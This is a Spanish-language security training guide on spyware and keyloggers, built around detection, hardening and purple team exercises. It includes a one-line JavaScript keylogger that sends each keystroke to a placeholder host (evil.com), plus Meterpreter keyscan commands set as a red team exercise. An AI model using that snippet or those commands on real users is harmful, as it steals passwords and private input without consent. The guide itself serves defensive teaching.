👁️‍🗨️ Spyware y Keyloggers

1️⃣ Explicación en Profundidad

🕷️ ¿Qué es el Spyware?

El spyware es un tipo de malware diseñado para espiar al usuario sin su conocimiento. Puede:

• Registrar la actividad del navegador.

• Tomar capturas de pantalla.

• Acceder a la cámara o micrófono.

• Redirigir DNS para llevar al usuario a sitios fraudulentos (pharming).

• Grabar pulsaciones del teclado (si incluye un keylogger).

🧠 Analogía: El spyware es como un espía oculto en tu oficina digital, observando cada movimiento, anotando todo lo que haces, sin que tú lo sepas.

🧠 ¿Qué es un Keylogger?

Un keylogger (registrador de teclas) es un tipo específico de spyware que captura cada tecla que el usuario pulsa. Su objetivo es robar información confidencial como contraseñas, números de tarjeta, datos personales o incluso conversaciones.

• Pueden ser software o hardware.

• Algunos se ocultan dentro de scripts maliciosos en sitios web.

• Otros se insertan como dispositivos físicos entre el teclado y el equipo.

🧠 Ejemplo real: Un atacante usa Metasploit + Meterpreter para entrar a un sistema remoto, activar el keylogger y extraer las pulsaciones, incluyendo credenciales de acceso a un sitio web.

📡 Técnicas de seguimiento y vigilancia encubierta

• Técnica Descripción
• Tracking cookies Archivos de texto creados por sitios web para almacenar datos de navegación. No son malware, pero pueden ser abusivos.
• Supercookies Se almacenan en ubicaciones difíciles de borrar como almacenamiento en caché o encabezados HTTP.
• Beacons Imágenes invisibles de 1x1 píxel que, al ser cargadas, permiten al servidor recopilar información del usuario (como fingerprinting del navegador).
• Adware Software potencialmente no deseado que cambia el comportamiento del navegador y expone al usuario a rastreo constante o ventanas emergentes agresivas.
• DNS Hijacking El spyware puede cambiar la configuración de DNS del equipo para redirigir al usuario a sitios falsificados.

2️⃣ Ejemplos Prácticos

• Caso 1: Un usuario instala un programa gratuito que incluye un plugin de navegador malicioso. Al abrir el navegador, se cargan páginas de patrocinadores y se crean cookies de seguimiento de terceros.

• Caso 2: Un atacante usa Meterpreter para acceder a un equipo remoto y ejecutar:

  bashCopiarEditarkeyscan_start keyscan_dump

  Captura credenciales y las usa para acceder a una aplicación bancaria.

• Caso 3: Se instala un dispositivo físico (keylogger USB) entre el teclado y el ordenador en una oficina. Captura todo durante días y transmite datos vía Wi-Fi a un AP oculto.

3️⃣ Aplicaciones y Herramientas Reales

• Red Team:

  • Metasploit + Meterpreter → keyscan_start / keyscan_dump

  • USB Rubber Ducky / Digispark para keyloggers físicos

  • BeEF (Browser Exploitation Framework) para capturar teclas desde JavaScript

• Blue Team:

  • Sysmon → detectar procesos que acceden a GetAsyncKeyState o SetWindowsHookEx

  • Antimalware + EDR con reglas específicas para actividad en winlogon.exe, explorer.exe, regedit.exe

  • Alertas SIEM por procesos desconocidos que acceden a dispositivos de entrada

• Herramientas para cazadores:

  • YARA + Volatility para detectar hooks en memoria

  • Process Monitor (ProcMon) para detectar hooks de teclado

  • Autoruns para detectar persistencia de spyware en el sistema

4️⃣ ¿Cómo se aplica esto en la Arquitecta de Seguridad?

Como arquitecta, diseño sistemas que impiden el rastreo silencioso, detectan spyware antes de que robe datos, y controlan puntos físicos vulnerables como los puertos USB.

Acciones clave:

• Políticas de control de dispositivos (bloquear USB no autorizados).

• EDR con detección de hooking de teclado.

• Bloqueo de extensiones y plugins sospechosos en navegadores corporativos.

• Control de acceso físico (vídeo vigilancia, bloqueo de puertos, alarmas por inserción de dispositivos).

5️⃣ ¿Qué hace cada equipo?

🔴 Red Team:

• Usa keyloggers para capturar credenciales en campañas de phishing o de acceso físico.

• Inserta dispositivos como USB keyloggers o script malicioso con document.onkeypress.

🔵 Blue Team:

• Detecta procesos que instalan hooks de teclado.

• Bloquea extensiones de navegador no firmadas o no aprobadas.

• Monitorea actividades sospechosas en puertos USB o grabaciones desde webcam.

🟣 Purple Team:

• Simula campañas con spyware/script y valida:

  • ¿Se detecta el acceso a SetWindowsHookEx?

  • ¿El SIEM recibe el evento?

  • ¿Se activa el playbook de respuesta automática?

• Revisa qué parte del ataque fue invisible y refuerza esa capa.

6️⃣ Resumen práctico

El spyware es malware de vigilancia, capaz de registrar actividad, redirigir tráfico y activar cámaras/micrófonos. El keylogger, su versión más directa, roba contraseñas capturando las teclas del usuario.
Como arquitecta de seguridad, diseño defensas que impidan instalación de spyware, bloqueen acceso físico no autorizado y monitoricen procesos que intenten engancharse al teclado.
El trabajo del Purple Team es simular estas técnicas y reforzar detecciones en memoria, registro y red para que ningún espía pase desapercibido.

🧪 Ejercicios Purple Team

1. Red Team:
   Simula una infección con Meterpreter. Usa keyscan_start y keyscan_dump para obtener texto capturado en la máquina víctima.

2. Blue Team:
   Crea reglas en Sysmon para detectar procesos que accedan a GetAsyncKeyState o SetWindowsHookEx. Integra alertas en SIEM.

3. Purple Team:
   Lanza un ataque con extensión maliciosa y valida:

   • ¿El EDR lo detecta?

   • ¿Se activa alguna alerta?

   • ¿Se responde automáticamente o manualmente?

Claves Avanzadas y Curiosidades sobre Spyware & Keyloggers

1. El spyware moderno ya no se instala… se inyecta

Hoy, los atacantes no necesitan instalar archivos. Pueden inyectar código directamente en procesos legítimos como explorer.exe, chrome.exe o winlogon.exe.

🧠 Clave de Threat Hunter:

• Monitorea procesos que crean remote threads o usan CreateRemoteThread, VirtualAllocEx y WriteProcessMemory.

🛠 Usa:

• Sysmon Event ID 8 + 10

• EDR con análisis de hooking

• Volatility o PE-sieve para verificar procesos inyectados en memoria

🖱️ 2. Keyloggers web: sin malware, solo JavaScript

Un atacante puede capturar pulsaciones desde una página maliciosa sin necesidad de instalar nada.

🧠 Curiosidad avanzada:
Un simple script como este puede capturar todo lo que se escribe:

javascriptCopiarEditardocument.onkeypress = function(e) { fetch("https://evil.com/keystroke?key=" + e.key); };

🛠 Claves defensivas:

• Usa extensiones como NoScript o navegadores endurecidos (Brave, Librewolf).

• Activa políticas de Content Security Policy (CSP) en navegadores corporativos.

• Escanea código JS de sitios internos y externos con herramientas como JSDetox o CodeQL.

🧿 3. Beacons invisibles: el spyware del píxel fantasma

Un solo píxel (1x1 invisible) puede usarse como baliza espía para saber cuándo y dónde abre un usuario un correo o visita una web.

🧠 Clave de cazador:
Monitorea peticiones a URLs sospechosas de carga de imágenes desde HTML externo o correos.

🛠 Usa:

• Firewall + NDR para inspección de tráfico saliente

• SIEM con alertas si el endpoint se conecta a dominios tipo tracking.*, metrics.*, cdn.spy.*

📡 4. Ataques persistentes desde DNS Hijacking silencioso

Algunos spyware reconfiguran las entradas DNS para llevar al usuario a sitios falsos aunque escriba correctamente la URL.

🧠 Clave de arquitecta:

• No uses DNS abiertos no controlados (como 8.8.8.8 en dispositivos corporativos).

• Implementa DNSSEC + DNS over HTTPS (DoH) para asegurar autenticidad.

• Usa bloqueo de cambios en el registro DNS del sistema operativo.

🧠 5. Keyloggers de hardware con Wi-Fi o BLE

No necesitas comprometer el sistema. Basta con un pequeño dispositivo entre el teclado y el puerto. Algunos tienen Wi-Fi o Bluetooth para enviar los datos capturados.

🧠 Clave defensiva física:

• Inspecciones físicas rutinarias en puestos de trabajo.

• Blindaje de puertos USB o uso de bloqueadores.

• Vigilancia por cámara en zonas sensibles.

• Políticas de "no conectar periféricos personales" estrictas.

🧱 6. Un spyware siempre necesita persistencia

Lo que no se puede quedar… no puede espiar. Por eso el foco debe estar en romper la persistencia.

🧠 Claves comunes de persistencia spyware:

• Claves en HKCU\...\Run

• Tareas programadas (schtasks, at)

• AppInit_DLLs, LoadLibrary, RunOnce

🛠 Usa:

• Autoruns (Sysinternals)

• Velociraptor con queries de persistencia

• Regshot para comparar cambios en el registro

🧪 7. No busques malware: busca síntomas de infección

A veces el spyware es invisible… pero sus efectos no lo son.

🧠 Indicadores secundarios:

• Actividad inusual del micrófono/webcam

• Redirecciones sospechosas al abrir el navegador

• Extensiones nuevas no autorizadas

• Procesos ocultos usando más memoria de lo normal

🛠 Herramientas:

• Process Explorer + modo "Verify Signature"

• Windows Resource Monitor para ver tráfico en tiempo real

• Tasklist /SVC /M para detectar DLLs cargadas sospechosas

Arquitectura Estratégica para Blindar el Territorio

• Área de riesgo - Defensa recomendada
• Keyloggers físicos - Puertos bloqueados, vigilancia física, inspección periódica
• Spyware en navegador - Control de extensiones, políticas CSP, aislamiento de sesiones
• Persistencia en el sistema - WDAC/AppLocker, auditoría del registro, detección de tareas programadas
• Inyecciones en memoria - EDR + Sysmon, escaneo YARA en RAM, restricciones de WriteProcessMemory
• Captura de pulsaciones - Alertas de hooking (SetWindowsHookEx, GetAsyncKeyState)

✅ Conclusiones Clave

• El spyware moderno no necesita instalarse, solo inyectarse, activarse o engañar al navegador.

• Un keylogger puede ser tan pequeño como un script invisible o tan sofisticado como un adaptador Wi-Fi encubierto.

• Como Threat Hunter, entrenas tu vista para detectar los efectos colaterales del espía.

• Como Arquitecta de Seguridad, diseñas el entorno para que incluso si entra, no pueda observar, moverse ni sobrevivir.

Consejos y Tips Avanzados de Threat Hunter + Arquitectura de Seguridad

🔍 1. Piensa como un espía: si tú fueras spyware… ¿dónde te esconderías?

Si fueras un spyware silencioso, ¿te instalarías como proceso propio o te inyectarías en explorer.exe, svchost.exe o chrome.exe?

✅ Tip de Hunter:

• Busca procesos con firmas legítimas que están haciendo cosas inusuales (por ejemplo, explorer.exe accediendo a la cámara).

• Usa reglas Sigma para detectar ejecución anómala dentro de procesos comunes.

🛠 Herramientas:

• Sysmon + Sigma

• CrowdStrike process graph

• Velociraptor Live Hunt

📡 2. Detección proactiva de keyloggers físicos y USB manipulados

Muchos keyloggers son invisibles al sistema operativo: están entre el teclado y el equipo, o en dispositivos maliciosos tipo Rubber Ducky.

✅ Tip de Arquitecta:

• Implementa bloqueo de dispositivos USB por clase (solo permiten HID de fabricantes específicos).

• Usa sensores USB que detectan eventos de conexión con características anómalas (por ejemplo, reportan como teclado pero no envían códigos válidos).

🛠 Herramientas:

• USBDeview para auditar historial

• GPO o Intune para control de dispositivos

• Hardware USB blocker (tapones físicos + alertas en BIOS)

🖥️ 3. Vigila la actividad en segundo plano: spyware = consumo invisible

Un spyware puede vivir callado, pero siempre consume algo: red, RAM o CPU, aunque sea poco.

✅ Tip técnico:

• Crea alertas por procesos desconocidos con:

  • Bajo uso de CPU pero conexión persistente

  • Actividad en puertos no estándar (como 8088, 4444)

  • Procesos con memoria protegida o ejecutable

🛠 Herramientas:

• Process Hacker

• Netstat + SIEM

• Windows Resource Monitor + logging extendido

🎭 4. Usa la técnica del "señuelo" para exponer al espía

Crea documentos falsos con nombres como contraseña_banco.txt y monitoriza quién los abre o accede a ellos.

✅ Tip cebo:

• Coloca documentos en carpetas compartidas con atributos de tracking.

• Usa Canarytokens para incrustar llamadas invisibles (como imágenes 1x1) que revelen actividad.

🛠 Herramientas:

• Canarytokens.org

• Honeyfiles + SIEM

• File Integrity Monitoring (FIM) en carpetas clave

🧠 5. No te olvides de los navegadores: extensiones = spyware legalizado

Muchas extensiones populares espían al usuario, capturan lo que escribe o venden el historial.

✅ Tip de arquitectura:

• Usa navegadores en modo hardening corporativo:

  • Desactiva extensiones no firmadas

  • Solo permite extensiones aprobadas

  • Forzar políticas de privacidad via GPO

🛠 Herramientas:

• ADMX templates de Chrome/Edge/Firefox

• Microsoft Intune para navegadores

• Navegadores endurecidos: Brave, Librewolf, Mullvad Browser

🔑 6. Si capturan la tecla, cambia el juego: MFA, biometría, autenticación out-of-band

El keylogger no puede robar lo que no se teclea. Si el secreto no está en la tecla, está seguro.

✅ Tip CISO:

• Habilita MFA en todo sistema sensible.

• Prefiere autenticación basada en token o app móvil (Google Authenticator, YubiKey).

• Usa Single Sign-On + monitoreo de uso anómalo.

🛠 Plataformas:

• Okta, Azure AD, Duo Security

• YubiKey + FIDO2

• Behavior-based Access Control (BBAC)

🔁 7. Revisión rutinaria de persistencia = limpia los nidos del espía

Si el spyware se queda, es porque lo dejaste anidar. Los lugares favoritos: el registro, tareas ocultas, carpetas temporales, y plantillas de Office.

✅ Tip de limpieza avanzada:

• Revisa:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run

  • schtasks /query /fo LIST /v

  • AppData\Roaming, Temp, %Startup%

🛠 Herramientas:

• Autoruns (Sysinternals)

• Regshot (antes y después de instalar algo sospechoso)

• WinPE para análisis offline

📚 BONUS – Diario de Caza del Espía

✅ Crea una plantilla de "espionaje cazado" para documentar cada hallazgo o simulacro:

• Campo: Ejemplo registrado
• Fecha del evento: 21/07/2025
• Tipo de amenaza: Keylogger (software) con persistencia en Run
• Método de infección: Script malicioso en página HTML
• Método de detección: SIEM correló evento de red + proceso anómalo
• Reacción del sistema: No automática – se aisla manualmente
• Acción correctiva: Se aplican políticas WDAC + MFA obligatoria
• Lección aprendida: Ampliar monitoreo a navegador + reforzar CSP

✅ Conclusión Final

🕵️‍♀️ Un espía digital no se anuncia: observa en silencio, y si no lo buscas… no lo verás.
🧠 Como Threat Hunter, no esperas la alerta perfecta, la provocas con señuelos, correlación y lógica.
🛡️ Como Arquitecta, no haces castillos de cristal, sino sistemas donde el espía se ahoga antes de poder moverse.